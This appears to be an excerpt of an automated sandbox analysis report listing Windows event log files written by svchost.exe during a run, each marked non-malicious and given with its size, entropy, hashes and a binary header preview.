                                                                        SSDEEP:768:0iasQiasCPIEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWD4gmd:jp1
                                                                        MD5:BE0C5D25BB626D883F98D4C1951A5825
                                                                        SHA1:199C3B32DF1EA8B69FA0F4FA862D0CCA7D80809D
                                                                        SHA-256:8572A9054444D2AE18DBA1F3819B95C5A60F75D9A175B2B8E04B9D760F21B977
                                                                        SHA-512:D0CA6A867D330D12024832B3E586E2BF91D28626A3C4D2120886A27CBB9EF95916B8B9B7D5A1F66DE63EA6401F9622DDB7972E171D1600DF372FE40ECC1F53F3
                                                                        Malicious:false
                                                                        Preview:ElfFile.........................................................................................................................ElfChnk.~...............~...................`...X....{$.........................................................................................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..p...~........qV..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):5.6958150068016895
                                                                        Encrypted:false
                                                                        SSDEEP:384:2hKa5QnzLFN5gnta569gzIzyzja5MAKxphpKWQOPM52KX8oAa5oZa569QzIzyz63:2ePFNIR0XNtqd2O2dZKLfA4BwuZ0
                                                                        MD5:655E783F9FFCA3A359FA2F164B9ED9FF
                                                                        SHA1:AF96B574D8EDA42E8034D7B2D9AAFC1A24038686
                                                                        SHA-256:68E8D626600821B14F9F4C87F757084A98ACBFDBCD2A8A4BAE033D90ACE150DF
                                                                        SHA-512:7568B3279855A83D6B289227F8465997AA95904C05EAF4DC40AF4FA99E12521EF436E5E8F2F110311B3A0A132903DEC901CB1DA969DDA9654235594A30874D1D
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................p...X....AL6................................................................................................................:...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................YM...........z..................................!/..........**..@...........\.g.6.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.9969363418868648
                                                                        Encrypted:false
                                                                        SSDEEP:384:Oh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMGmMqb+MvhMIp:OeJWU
                                                                        MD5:F3F76FCFEA8151604EA805CB80B1FF45
                                                                        SHA1:53062346A40583E0ED706493B387818CF85A608A
                                                                        SHA-256:46BE32A18F777427FCB76E515EDD8612F22823F8D5F9C75FAF64DFBC9D810BC0
                                                                        SHA-512:DF7829C3655FC7F7AF8C6F82DF8F48C3842AB6AC99B32705AC232DDD1D7398A93B3C03BA8217D055702FB8881AC8FC5DECCEAB8E2ED23F8B73C7B2737DFD00C2
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................+..0-...i........................................................................z4........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................................................................................................%..........**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.231994720329579
                                                                        Encrypted:false
                                                                        SSDEEP:384:ehk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS16:eBjdjP0csCk+
                                                                        MD5:2418B580C396BF3D2B2E78EF78F65991
                                                                        SHA1:5AA4D8E6E8EC06232294A57762DCF70B6A4AEC46
                                                                        SHA-256:4FA9363ED99CF66AA2B887DB72C99F7E21B364AAFE0C169B5CEACEF72E971557
                                                                        SHA-512:650C05CE840801E047324A41E74F07718BC4503AD16860C4161B31027B2D480F0DD72B1EB936F08C3985DDAE151D7340D1C7DD09C61F957694A3A800F7923F4C
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........................................p...$.._......................................................................5.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):3.1873921092092026
                                                                        Encrypted:false
                                                                        SSDEEP:384:s/hDIEQAGxIHIFIWHIft6IT/nIGIEI8pIftaIT/JIdIWIyIILIQIhI0vcI7IftqS:s/ZxGuTcrd
                                                                        MD5:83A5B8E61F30C79883730950AEA98A44
                                                                        SHA1:C8B71007E20DEF19873CA38E83E68BBF1D9FB1F2
                                                                        SHA-256:F23CEB96B97C63703797FC1BB2CC924CF89B31F562BE9ABD5D5A64E4D7D9035E
                                                                        SHA-512:06DF2A7C93BA3C8449C58D253771A7D36B13B8DED6C3E96F34B123D18F6FAA526519A8DF1B27696263452EBD65F8EB672A8F26708F88DE6D9C381D69F932EAD1
                                                                        Malicious:false
                                                                        Preview:ElfChnk.T...............T...................P...h...m......................................................................Q.;........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1........................................<...............(..........**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.8010759015442367
                                                                        Encrypted:false
                                                                        SSDEEP:384:Zmh6iIvcImIvITIQIoIoI3IEIMIoIBIjIIQIYIRIEMIO4I:ZmoxDJ
                                                                        MD5:697F5D7E812BBBA5F48BAEEE79161558
                                                                        SHA1:2BB9620AEAFE781DAD1250C78AE760F530C04FEF
                                                                        SHA-256:1F9630EFD18553522D80986F123499E9172D5D8949BD43F82D0964ED671CE516
                                                                        SHA-512:166A91F00C96D4B5DB8C75B843FCD2ED191CAF2D82CEB41138FD22663D481CB50BF38D5C522524C94033EE7CD3C303AFA60261F95900299C73E2E0277834C598
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................X"...#..!.._.....................................................................8.Y............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................^...........**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):2.9976457275581723
                                                                        Encrypted:false
                                                                        SSDEEP:768:j4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13N:p
                                                                        MD5:8B81799FB23EDB0DFBBE63CB0A6D0091
                                                                        SHA1:08F10769E5AC65A808F3229113875C18E68F02A2
                                                                        SHA-256:199F3107FA0F478BECC0D255CA70F74B63F048F6B43015C4BCEFC7DB07358609
                                                                        SHA-512:098626BC09ECABD19653ADFE82C5CC8A73C4CD1537C28E781484F6B676E837896C892B3E0691E5D469C1972A76B646456E14907280D1040181C1F973B9302E61
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................(...8...&..........................................................................`................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):70176
                                                                        Entropy (8bit):3.8939514906771358
                                                                        Encrypted:false
                                                                        SSDEEP:768:uVqutDBjV8k+u7eUtHPoVWWNHrWbGyYKQc90XR07SZRcZv76NcRUjGHzLKvc90X:1utDBjV8k+u7PtHPoVW
                                                                        MD5:75BDC1E4C679C0EC2D928005E0AD64F4
                                                                        SHA1:72FA9668F0DCEBA1619C352BAA88533C37BCCDD5
                                                                        SHA-256:9CA649D88D192305D96FB92A4998B0C24D3D22BC8F34A8E6526434C0348405EB
                                                                        SHA-512:0079C0CFD1F09ED44EFE15D5438079D7EB7101C912D79E3397465590970B73853D65D311E90EB9C947F073578FB7D55C5DBACBAAE2A9C28EBAD5B9709C4E85E5
                                                                        Malicious:false
                                                                        Preview:ElfChnk.................N.......T............... ...d&.......................................................................\.f................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................a...........&...........**......N........l7.6.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):196240
                                                                        Entropy (8bit):5.349645426647352
                                                                        Encrypted:false
                                                                        SSDEEP:1536:ZWp1WproWpsWpPv4wWp1WproWpsWpPv4wIb0welzWp3WpOLgmewWp1WproWpsWpF:cKJVcKJVZwboVKJVPA7YmIH9
                                                                        MD5:663E5A3851828DE2B7B20E14A1941A14
                                                                        SHA1:F79CAEB6B0870BEA5901AA6E531139381EA2D6A4
                                                                        SHA-256:EB22CADA7FFC601A29CB54AAACEAD8EF1314F07BF56C5062D0B97D403950BA14
                                                                        SHA-512:56817DC36FDDF31567A1C643E435393DD2027BD48FF8CA1A1EB5BAFB785C2CA4C28373A5A81A3D9F1E06F6193F7631C2F52A96A3EBD1C8A31C6D10BF4744C2AF
                                                                        Malicious:false
                                                                        Preview:ElfChnk.9.......a.......9.......a...........Xw...y....5......................................................................K..................`...........................=...........................................................................................................................f...............?...........................m...................M...F.......................G0........................... ..."..............7........)..................................9............'......&...........**..h...9........!b.6.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.7589270703948895
                                                                        Encrypted:false
                                                                        SSDEEP:384:fhP8o8Z85848V8M8g8D8R8E8y8eE8U8+8G8:fy
                                                                        MD5:DB0D7D192D45E88155DA386A4CFAA7BC
                                                                        SHA1:0CA51DB6F3145F47A7DEE55DD59804DDC20788FF
                                                                        SHA-256:4D675E0BB5F2F8FB820C9A7E60290AA18EB63DB48D85C343D67B7D1036CAF535
                                                                        SHA-512:77BF88FE30C9A2E76B610094998F26BB168BAC41DA2A70C4BCB9C7A7A67B2821C6E7F2D57535CBB47EBC07A89F69BA997028F30ED43D507CB0E9C268BDC74789
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........................................8!....RE.....................................................................J>.........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................................v...........**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):3.767702433173047
                                                                        Encrypted:false
                                                                        SSDEEP:1536:mXhJUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:mXrnS
                                                                        MD5:FC61A6086D55D8FFBB4AFEBAEADBE6DF
                                                                        SHA1:99D724432ACE2264C912861B11A359A329AE0510
                                                                        SHA-256:F303789F5D286B4601E578EEF36186A423653DEF71E1E6410C732D7A126FE5A4
                                                                        SHA-512:EBD922324FE6FD8F8159422F10BB6F70A3289DA380208C36A402BD1F18D771F5F465E71898DC3DD741590A58B0DEE609957E5809EE8FE1CB82B03E5B3443FCBB
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........(...............(............J..pL...4......................................................................[.m.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................O............9..........**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):2.3821645601708283
                                                                        Encrypted:false
                                                                        SSDEEP:768:U0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O4aui1J6eJOQJMBJX:4cE
                                                                        MD5:CBF5E5B9F2994F33BE03BF0A826A629E
                                                                        SHA1:BFF85BF98CE5D092C06B3A7D366A077B5736E934
                                                                        SHA-256:B6B321D43FBF2CEE1D19A0EB4E3AA5134660D844E2DED9871E98A58DE11461E3
                                                                        SHA-512:7FFD68E0DE84CFD8CF091526E624209FF41644A2EBBEF4BED8584F11F4EC333BC5BA880257417930C6DAB318094D59479BB160949CAAC0FC985A3EE946071D73
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........>...............>...........0v..`x....p.......................................................................+#................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&....]..................................................................................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):82184
                                                                        Entropy (8bit):4.099356787060528
                                                                        Encrypted:false
                                                                        SSDEEP:768:ZUbGDA5eVLpBVi7CPDRmf5dX6CFLxVUbGDA5eoY:VtBVi0Y
                                                                        MD5:8918E8D453A612DEDD6754EED5E48B58
                                                                        SHA1:5AC9DDCB5AC277ED720E3BA81E0B46AD305C9047
                                                                        SHA-256:04693211287A6E30D60BD9A75F82F1BC8D8F5F5670022B02F99E251620A02F25
                                                                        SHA-512:B0F9CD6268474119E14C26E6FFBADD2CE96236B18F926436569F6FF3DB3896B3B1954FC967FACECFAFBEE8D4BE266CE5AEC4C88D8BC528ECB7CE219925D475D6
                                                                        Malicious:false
                                                                        Preview:ElfChnk.'.......-.......'.......-............1...8...a......................................................................N.Pl................X...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................1...........................................................................................&...........**......'........&.E..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.315070457008112
                                                                        Encrypted:false
                                                                        SSDEEP:384:NYU/hDGCyCkCzCRCFCZC4MCyCcC7CgzCiCoCD24F2a2EO2M2w2s023C8CJCpCFIz:NYU/dEoNTC
                                                                        MD5:C7807651248E908ECCF27697EBB71AF0
                                                                        SHA1:4FE175151F778EF674F74D25145CCCF62C52F2C8
                                                                        SHA-256:A9D4FFC731E3D8287A25FFE350D5142FE1E9CD5D377F0BD7D29BB827C2F12658
                                                                        SHA-512:5A8FA490F7BFC98FD39635AA30A0E92AA3C9FFC279424C7D23E9F2893CF7B0FC91BF1F3DAFD14CA006B437AB6E18FAA67FBF7AF96E5347FE27042B262235214D
                                                                        Malicious:false
                                                                        Preview:ElfChnk.U...............U...........................$....................................................................O...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................4..............................&................................................................n...........N..........**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.482742417101403
                                                                        Encrypted:false
                                                                        SSDEEP:1536:bcPLvjwmE+ukWvw75NFyBo/QbG7YX1cchg52p5cfFSYl8ZAgRrfhXWmSY0NGQ6my:bcPLvjwmE+ukWvw75NFyBo/Qq7YX1cct
                                                                        MD5:B1F20410E64B0CD42CE4FCBF7AFC9018
                                                                        SHA1:4EE19EB81E1C99FDC1C7BA4E87F091AB124FE250
                                                                        SHA-256:7AE6BA887BEF8232508D1660717AA893FE68C75D3E4B2D48668AC1E4CD3C0461
                                                                        SHA-512:31EDD8B6257AE2C232572765C7ED08A4BA016499A3B0340D55AF1796AD633D17533C0288E07F9B5E74D19A5CF842A63468AE54F61A49F680722E95A48983DE01
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................8i...j.............................................................................5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&............................................................................I..........**..............XH^...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.468247314352683
                                                                        Encrypted:false
                                                                        SSDEEP:1536:axp4HTQMhzEB1PBM+4MFGhLF/EBRyqXiUHeISNpdxzaEOWqS6vPzaS8g8jhxVo8Z:axp4HTQMhzEB1PBM+4MFGh5/EBRyqXi5
                                                                        MD5:9ED937A12E6D4085FF215C79428BEA18
                                                                        SHA1:99B55FC015C0506DB9833496B3F23C3B3FF1B74E
                                                                        SHA-256:80158C527355458014138964012A1994AACA3DF918095BD8686E78CE8F0EE2A6
                                                                        SHA-512:5695049181E1804521C27393E5FC37AC0452B2B8AA8CEF77D5497441852CCD5D4E953E31AFC706DDBCAD8DEC3EF7BC7133B7C7539B6C43A2D1A06BA337D7DE35
                                                                        Malicious:false
                                                                        Preview:ElfChnk.+.......Z.......+.......Z............[..0]....k......................................................................W..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................yM......Q7...........P..!5...0..........&...Y9......**......+.......P;............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.512081865341501
                                                                        Encrypted:false
                                                                        SSDEEP:384:Arhl787V7s7y7s7M787/7m7C7p74797kc7h7s7b7Y717c7v7b7v7vV7p73a7k7Z+:Ut/8Hh
                                                                        MD5:50465D28597F69AA4BA1836894D19750
                                                                        SHA1:CC55004E17EAAF1672D0BDAE3A746C40F6AF7593
                                                                        SHA-256:376CBE44BE97D96C93CAB0B83E5480DF2D3EA3CE0169E199BBAC9D7650F4AB93
                                                                        SHA-512:725A9F34A7A98390A365F75B2701E31331C2F3CDD1CF62BABB20C3F5655DC0798469B353E7839E8159DBBE733B58A76DA3ABDAC6E7EE4A4D672CB934AC296F49
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................n...o..-o......................................................................../V............................................=...........................................................................................................................f...............?...........................m...................M...F...........................-(..............E!..s...........&...............................................................-&..........f@..........**..@.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):2.2719028651564623
                                                                        Encrypted:false
                                                                        SSDEEP:384:/hc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauing:/6Ovc0S5UyEeDgLLyfrlB8Q54GJY
                                                                        MD5:104AF6C87B1FA1C965BB2D3CF70EDC8F
                                                                        SHA1:91B208CE7ACC6EDAD1ADC8C5ECBB90000E00CEA2
                                                                        SHA-256:6DB30804B563EE808F78EEC69D3A85FF7F3F0FE551306B5924530C2C0EC2738C
                                                                        SHA-512:90A83431708CD8FBDC9FAD6AF191EDF3E264D8DEB457ABBCCA8941E15DE0DD4E4C2FB2D89B281C2FA11CA5D627010C96EBE3C43B6338DCA27E7701A883F8C295
                                                                        Malicious:false
